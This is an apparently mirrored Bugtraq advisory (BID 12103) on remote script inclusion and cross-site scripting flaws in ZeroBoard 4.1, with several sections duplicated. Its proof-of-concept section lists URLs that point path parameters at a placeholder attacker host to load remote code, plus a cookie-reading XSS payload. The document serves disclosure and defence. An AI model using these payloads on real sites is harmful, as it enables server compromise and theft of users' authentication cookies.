ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
BID:12103
Info
ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12103 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2004 12:00AM |
| Updated: | Dec 24 2004 12:00AM |
| Credit: | Jeremy Bae is credited with the discovery of these issues. |
| Vulnerable: |
Zeroboard Zeroboard 4.1 pl4 Zeroboard Zeroboard 4.1 pl3 Zeroboard Zeroboard 4.1 pl2 |
| Not Vulnerable: | |
Discussion
ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
Multiple script injection and cross-site scripting vulnerabilities reportedly affect ZeroBoard. These issues are due to a failure of the application to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side scripts and carry out cross-site scripting attacks against unsuspecting users. This may facilitate a compromise of the host computer, as well as theft of cookie-based authentication credentials. Other attacks are also possible.
Multiple script injection and cross-site scripting vulnerabilities reportedly affect ZeroBoard. These issues are due to a failure of the application to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary server-side scripts and carry out cross-site scripting attacks against unsuspecting users. This may facilitate a compromise of the host computer, as well as theft of cookie-based authentication credentials. Other attacks are also possible.
Exploit / POC
ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
No exploit is required to leverage these issues. The following proof of concepts have been made available:
http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/
http://www.example.com/include/write.php?dir=http://[attacker]/
http://www.example.com/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>
No exploit is required to leverage these issues. The following proof of concepts have been made available:
http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/
http://www.example.com/include/write.php?dir=http://[attacker]/
http://www.example.com/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>
Solution / Fix
ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
References:
References: